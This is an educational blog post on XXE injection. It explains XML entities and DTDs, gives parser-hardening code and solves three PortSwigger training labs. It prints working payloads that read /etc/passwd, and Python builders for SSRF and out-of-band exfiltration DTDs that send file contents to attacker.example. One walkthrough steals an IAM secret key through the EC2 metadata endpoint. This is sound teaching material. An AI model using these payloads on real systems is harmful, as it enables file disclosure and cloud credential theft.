Web Security Vulnerabilities - XML external entity (XXE)

What is XML?

Extensible Markup Language, also known as XML, is a markup language similar to HTML, designed to store and transport data. It facilitates data exchange between systems such as websites, databases, and third-party applications. Unlike HTML, which has predefined tags, XML allows you to define your own tags tailored to specific needs.

Why do we use XML?

XML supports robust schema validation through XML Schema Definition (XSD) or Document Type Definition (DTD).
XML handles document-oriented data, such as text mixed with markup, attributes, and namespaces, more naturally than JSON.
XML is plain text and platform-independent, so different systems can exchange it without a proprietary conversion step.

JSON excels in lightweight, web-based, or mobile applications where simplicity, speed, and ease of use are critical. However, XML’s strengths in schema validation, namespaces, and document handling make it indispensable for specific use cases.

What are XML entities?

XML entities are named placeholders that represent data within an XML document; the parser replaces each reference to an entity with that entity's value.

Example:

In the example below, we define an entity called name with the value John.

<!DOCTYPE note [
  <!ENTITY name "John">
]>
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>&name;</heading>
  <body>Don't forget me this weekend!</body>
</note>

The entity reference &name; will be replaced by its value (John) by the XML parser.
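To see the substitution happen, here is a minimal sketch that feeds the note document above to Python's standard-library ElementTree parser (built on expat), which expands entities declared in the internal DTD:

```python
import xml.etree.ElementTree as ET

# The note document from the example above, including its internal DTD subset.
NOTE = """<!DOCTYPE note [
  <!ENTITY name "John">
]>
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>&name;</heading>
  <body>Don't forget me this weekend!</body>
</note>"""

root = ET.fromstring(NOTE)
# By the time we read the tree, the parser has already replaced &name; with its value.
print(root.find("heading").text)  # John
```

The application never sees `&name;` itself, only the replacement text. That is exactly why entities become dangerous once their values can come from outside the document.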

The predefined entities &lt; and &gt; represent the characters < and >. These are metacharacters used to delimit XML tags, so they must generally be written using their entities when they appear within data.
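A short sketch of this round trip, using Python's `xml.sax.saxutils.escape`/`unescape` helpers. Note that `&` is also a metacharacter and has its own predefined entity, `&amp;`:

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, unescape

raw = "if a < b && b > c"
# escape() rewrites &, < and > as the predefined entities &amp;, &lt; and &gt;.
encoded = escape(raw)
print(encoded)  # if a &lt; b &amp;&amp; b &gt; c

# Parsing turns the entities back into the original characters.
element = ET.fromstring(f"<expr>{encoded}</expr>")
print(element.text == raw)  # True
print(unescape(encoded) == raw)  # True
```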

What is Document Type Definition (DTD)?

Document Type Definition (DTD) defines the structure and legal elements of an XML document.

Example:

<!DOCTYPE note
[
<!ELEMENT note (heading,body)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>

In this example, the DTD is declared using the DOCTYPE keyword.

<!ELEMENT note (heading,body)> defines that the note element must contain the elements heading and body, in that order.

<!ELEMENT heading (#PCDATA)> defines that the heading element must contain only #PCDATA (parsed character data).

The DTD can be fully self-contained within the document itself (known as an “internal DTD”), loaded from elsewhere (known as an “external DTD”), or a hybrid of the two.

What are XML external entities?

XML external entities are a type of custom entity whose value is loaded from outside the DTD in which they are declared. They allow content from external sources to be included in an XML document. External entities are declared using the SYSTEM keyword in the <!ENTITY> declaration, followed by the URL or file path from which the value should be loaded.
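The difference between the two kinds of declaration is visible to the parser itself. The sketch below uses the `EntityDeclHandler` callback of Python's `xml.parsers.expat` to list each declared entity; the helper name `list_entity_declarations` is hypothetical. The sample document declares but never references the external entity, so nothing is actually fetched:

```python
from xml.parsers import expat


def list_entity_declarations(xml_text):
    """Return (name, kind, value_or_system_id) for each entity declared in the DTD."""
    found = []

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        if value is not None:
            # Internal entity: the replacement text is in the declaration itself.
            found.append((name, "internal", value))
        else:
            # External entity: only an identifier (here a SYSTEM URI) is given.
            found.append((name, "external", system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


DOC = """<!DOCTYPE shop [
  <!ENTITY name "John">
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<shop/>"""

decls = list_entity_declarations(DOC)
print(decls)
```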

What is XXE Injection?

XML External Entity (XXE) Injection is a security vulnerability that occurs when an application parses attacker-controlled XML with a parser that resolves external entities. By declaring a malicious external entity, an attacker can view files on the application server or make the server interact with external or internal systems.

Example:

Assume a shopping application uses XML to store and transport data on the product details page.

The XML code:

<?xml version="1.0" encoding="UTF-8"?>
<shop>
  <productId>5</productId>
  <name>T-Shirt</name>
</shop>

An attacker could exploit this by declaring an external entity that points to a file on the server and then referencing that entity inside one of the data values:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE shop [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<shop>
  <productId>5</productId>
  <name>&xxe;</name>
</shop>

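In the above example, the attacker tries to retrieve the /etc/passwd file from the server. If the application includes the name value in its response, the contents of /etc/passwd are returned to the attacker.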
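Whether this works depends entirely on the parser. As a contrast, here is a sketch with Python's standard-library ElementTree, which (according to the Python documentation) does not expand external entities and raises `ParseError` when it meets one. The helper `product_name` is hypothetical:

```python
import xml.etree.ElementTree as ET

BENIGN = """<shop>
  <productId>5</productId>
  <name>T-Shirt</name>
</shop>"""

MALICIOUS = """<!DOCTYPE shop [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<shop>
  <productId>5</productId>
  <name>&xxe;</name>
</shop>"""


def product_name(xml_text):
    """Return the <name> text, or None if the parser rejects the document."""
    try:
        return ET.fromstring(xml_text).find("name").text
    except ET.ParseError as err:
        # The external entity is reported as an error instead of being fetched.
        print("rejected:", err)
        return None


print(product_name(BENIGN))  # T-Shirt
print(product_name(MALICIOUS))
```

A parser configured to resolve external entities would instead have placed the file's contents in `<name>`.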

What are the types of XXE Injection attacks?

Exploit XXE to retrieve files

The attacker modifies the submitted XML to define an external entity containing the path to a file and references it in a data value that the application returns in its response.
Exploit XXE to perform SSRF

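Attackers can define an external entity that points to a URL, forcing the application server to make HTTP requests to any system it can reach, including internal systems that are not exposed to the internet (server-side request forgery).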
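For SSRF, only the SYSTEM identifier changes: it becomes a URL instead of a file path. A minimal sketch that builds the shop document from the earlier example around an arbitrary target URL (the function name and the host `internal.example` are hypothetical placeholders):

```python
from urllib.parse import urlsplit


def ssrf_payload(target_url, product_id="5"):
    """Return the shop document with <name> bound to an external entity at target_url."""
    if urlsplit(target_url).scheme not in ("http", "https"):
        raise ValueError("expected an http(s) URL")
    if '"' in target_url:
        # A double quote would terminate the SYSTEM literal early.
        raise ValueError("URL must not contain a double quote")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE shop [ <!ENTITY xxe SYSTEM "{target_url}"> ]>\n'
        "<shop>\n"
        f"  <productId>{product_id}</productId>\n"
        "  <name>&xxe;</name>\n"
        "</shop>\n"
    )


# internal.example stands in for a host reachable only from the server.
print(ssrf_payload("http://internal.example/admin"))
```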
Exploit blind XXE to retrieve data via error messages

Blind XXE means that the application doesn’t return the values of defined external entities in its responses. An attacker can still exploit it by triggering a parsing error whose error message contains sensitive data, such as the contents of a file.
Exploit blind XXE to exfiltrate data out-of-band

Here, sensitive data is transmitted from the application server to a system that the attacker controls. The attacker hosts a malicious DTD on a system they control and then invokes that external DTD from within the in-band XXE payload.
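Both blind techniques rely on parameter entities inside an attacker-hosted DTD, and they differ only in where the nested entity points. A sketch of that structure, assuming hypothetical function names and a placeholder host `attacker.example`; single-line files such as /etc/hostname often work best out-of-band, because newlines can break the resulting URL:

```python
def build_external_dtd(file_path, sink_prefix):
    """Return the text of the attacker-hosted DTD.

    sink_prefix decides how the file contents leak:
      * an http(s) URL on a server you control -> out-of-band request
      * a nonexistent file:// path -> error message (error-based blind XXE)
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{file_path}">\n'
        # &#x25; is a character reference for "%", so it only becomes a
        # literal % in eval's replacement text, while %file; is expanded
        # (to the file contents) when eval itself is declared.
        f"<!ENTITY % eval \"<!ENTITY &#x25; leak SYSTEM '{sink_prefix}%file;'>\">\n"
        "%eval;\n"
        "%leak;\n"
    )


def build_invoker(dtd_url, root="shop"):
    """Return the in-band payload that makes the parser load the external DTD."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE {root} [ <!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe; ]>\n'
        f"<{root}><productId>5</productId></{root}>\n"
    )


print(build_external_dtd("/etc/hostname", "http://attacker.example/?x="))
print(build_external_dtd("/etc/passwd", "file:///nonexistent/"))
print(build_invoker("http://attacker.example/malicious.dtd"))
```

The DTD has to be external because XML forbids parameter entity references inside markup declarations in the internal subset.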

What is the impact of XXE Injection?

XXE vulnerabilities can be quite dangerous because they can lead to the disclosure of sensitive information and other serious security issues. Exploiting an XXE Injection vulnerability may lead to:

Arbitrary file read (sometimes loosely called Local File Inclusion, LFI): An attacker can exploit XXE to read sensitive files from the server, such as configuration files, credentials, or other confidential data.
Server Side Request Forgery (SSRF): XXE can be used to trigger the server to make requests to other systems, potentially disclosing sensitive information or performing unauthorized actions.
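Remote Code Execution (RCE): In some environments, for example PHP with the expect extension installed, an external entity using the expect:// wrapper can execute arbitrary commands on the server.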
Data Exfiltration: Attackers can use XXE to exfiltrate data from the server by including external entity declarations that send data to an external server controlled by the attacker.

How are XXE Injection attacks categorized?

In an in-band XXE attack, the attacker sends the attack and receives a response through the same channel, for example, via a direct HTTP request and response.
In an out-of-band XXE attack, the vulnerable system sends the results of an attack to a different resource controlled by the attacker. For example, the attack may be performed using a direct request but cause the hacked web server to send a sensitive file to the attacker’s own web server.
In a blind XXE attack, the attacker does not receive any direct response or result following an attack. Instead, they observe the behavior of the vulnerable web application (for example, the error messages it generates) to determine whether the attack was successful and use this indirect feedback to exfiltrate information step-by-step.

How to prevent XXE Injection?

Most XXE Injection vulnerabilities arise because the application's XML parsing library supports potentially dangerous features that the application doesn’t need. The most effective way to prevent XXE Injection is to disable those features, in particular Document Type Definition (DTD) processing and external entity resolution.

Disable DTD:

Java:

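import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Reject any document that contains a DOCTYPE declaration.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth: never resolve external general or parameter entities.
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);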

Python:

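from lxml import etree

xml_string = b"<shop><productId>5</productId></shop>"  # untrusted input
# resolve_entities=False: don't substitute entities; no_network=True: don't fetch over the network
parser = etree.XMLParser(resolve_entities=False, no_network=True)
root = etree.fromstring(xml_string, parser)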

.NET (pass these settings to XmlReader.Create):

using System.Xml;
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit; // any DTD now makes the reader throw XmlException
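Python's standard library has no single "disallow DTD" switch like the ones above. One stdlib-only sketch, loosely modeled on what the defusedxml package does (for example `defusedxml.ElementTree.fromstring(..., forbid_dtd=True)`), is to refuse any document with a DOCTYPE before handing it to ElementTree. The names `DTDForbidden` and `parse_without_dtd` are hypothetical:

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when an input document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_without_dtd(xml_text):
    # Pass 1: a bare expat parser whose only job is to spot a DOCTYPE.
    # The handler fires as soon as the DOCTYPE starts, before any entity
    # in the internal subset is declared or referenced.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)
    # Pass 2: with no DTD there are no custom entities to abuse, only the
    # five predefined ones, so a normal parse is safe from XXE.
    return ET.fromstring(xml_text)


root = parse_without_dtd("<shop><productId>5</productId></shop>")
print(root.find("productId").text)  # 5
```

Parsing twice costs some speed; the trade-off buys a check that does not depend on how a particular parser version treats entities.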

Time to practice

Let’s practice on some labs to get a better understanding of XXE vulnerabilities. Today’s challenges are from PortSwigger’s Web Security Academy.

Challenge #1

The goal of the first challenge is to read the /etc/passwd file, so let’s start with the web page.

[Screenshot: lab description]

The web page is a shop. Looking around, we find a "Check stock" feature, so let’s click it and intercept the request in Burp Suite.

[Screenshot: lab home page]

[Screenshot: first test]

The request just checks the stock, and the data is sent as XML, which suggests the endpoint may be vulnerable to XXE Injection.

[Screenshot: request in Burp]

So, let’s test for XXE by trying to read an internal file like /etc/passwd with this payload:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>

First, we declare a DTD for the document using the DOCTYPE keyword, placed between the XML declaration and the root element.

Inside it, we declare an entity named xxe using the ENTITY keyword.

Since our goal is to read a file, we use the SYSTEM keyword and point it at the file with the file:// protocol.

Finally, we replace the productId value with the &xxe; entity reference, which the parser replaces with the file’s contents.
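The two edits to the intercepted body (inserting the DOCTYPE and swapping the product ID for `&xxe;`) can be sketched as a small builder. The body shape `stockCheck`/`productId`/`storeId` is an assumption about the lab's check-stock request, so compare it with what Burp shows before relying on it:

```python
# Payload from the step above (DOCTYPE name "test", entity name "xxe").
XXE_DOCTYPE = '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'


def stock_check_body(product_id, store_id="1", doctype=""):
    # Assumed shape of the lab's check-stock body; adjust element names
    # if the request you intercepted differs.
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        + doctype  # must sit after the XML declaration, before the root element
        + "<stockCheck>"
        + f"<productId>{product_id}</productId>"
        + f"<storeId>{store_id}</storeId>"
        + "</stockCheck>"
    )


original = stock_check_body("1")
exploit = stock_check_body("&xxe;", doctype=XXE_DOCTYPE)
print(exploit)
```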

[Screenshot: exploit]

And we have solved the lab.

[Screenshot: lab solved]

Challenge #2

In the second challenge, we need to read the /etc/hostname file to solve the lab. So let’s start.

[Screenshot: lab description]

Looking around the web page, we can see an image upload feature in the comment section of a post.

[Screenshot: lab home page]

[Screenshot: first test]

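Since this is an XXE lab, we need to find a way to get the server to parse an XML file we control.

SVG is an XML-based image format, so if the server processes uploaded SVG images with an XML parser that resolves external entities, an attacker can upload a malicious SVG image to exploit XXE.

So, let’s first upload a normal SVG image and see whether the application accepts it.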

[Screenshot: upload succeeded]

[Screenshot: upload succeeded, continued]

As we can see above, SVG files are allowed. So, let’s create a local SVG file with our payload.

The payload is similar to the one in the previous challenge, but this time we read the /etc/hostname file.
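One way to write that payload is sketched below: the external entity is referenced inside an SVG `<text>` element so that, if the server's image processing resolves it, the file contents are drawn into the rendered image. The function name is hypothetical, and the width, height, and font values are arbitrary choices:

```python
def svg_xxe(file_path="/etc/hostname"):
    """Return an SVG document whose visible text is an external entity."""
    return (
        '<?xml version="1.0" standalone="yes"?>\n'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file://{file_path}"> ]>\n'
        '<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">\n'
        '  <text font-size="16" x="0" y="16">&xxe;</text>\n'
        "</svg>\n"
    )


# Save the printed output as a local .svg file and upload it as the image.
print(svg_xxe())
```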

[Screenshot: exploit step 1]

Now let’s go back to the comments section and open the uploaded image in a new tab.

[Screenshot: exploit step 2]

The image shows the server’s hostname, which is the lab solution, so let’s submit it and solve the lab.

[Screenshot: exploit step 3]

[Screenshot: lab solved]

Challenge #3

The challenge description tells us that the lab server is running an EC2 metadata endpoint at http://169.254.169.254/. To solve this lab, we need to obtain the server’s IAM secret access key from that endpoint.

[Screenshot: lab description]

The web page looks like the one in the first challenge, so let’s click "Check stock", intercept the request, and send it to Burp Repeater.

[Screenshot: lab home page]

[Screenshot: first test]

[Screenshot: request in Burp]

As we can see above, the data is sent as XML, so we use the same payload as in the first challenge to test whether the application is vulnerable to XXE.

We can see the application is vulnerable to XXE and we can read files on the system.

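[Screenshot: exploit step 1]

So, what we need is to make the server request the EC2 metadata endpoint and return its data. Let’s try it by pointing the entity’s SYSTEM URL at http://169.254.169.254/.

[Screenshot: exploit step 2]

Since we can access the EC2 metadata endpoint, let’s keep going and follow its directories to reach the secret key. Each response shows the name of the next path segment.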

/latest/

[Screenshot: response for /latest/]

/meta-data/

[Screenshot: response for /meta-data/]

/iam/

[Screenshot: response for /iam/]

/security-credentials/

[Screenshot: response for /security-credentials/]

/admin

[Screenshot: response for /admin]
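The walk above amounts to growing one URL a segment at a time and re-sending the same XXE payload with it. A sketch of that loop follows; the segment list mirrors the steps shown (including the role name admin), while the function names and the `stockCheck` body shape are assumptions carried over from the first challenge:

```python
METADATA_BASE = "http://169.254.169.254/"
# Path segments discovered one response at a time in the walk above.
SEGMENTS = ["latest", "meta-data", "iam", "security-credentials", "admin"]


def metadata_url(segments):
    return METADATA_BASE + "/".join(segments)


def stock_check_ssrf(url):
    # Assumed check-stock body, with the entity pointing at a URL instead of a file.
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{url}"> ]>'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )


# One request per step: each response reveals the next segment to append.
for depth in range(1, len(SEGMENTS) + 1):
    print(stock_check_ssrf(metadata_url(SEGMENTS[:depth])))
```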

Now that we have the SecretAccessKey, let’s submit it and solve the lab.

[Screenshot: lab solved]

Conclusion

In this blog, we covered what XXE is, its types, its impact, and how to prevent it. We also covered the basics of XML and solved labs to get a better understanding.

I hope you enjoyed it! Thanks for reading.

Abdelrahman Elshinbary
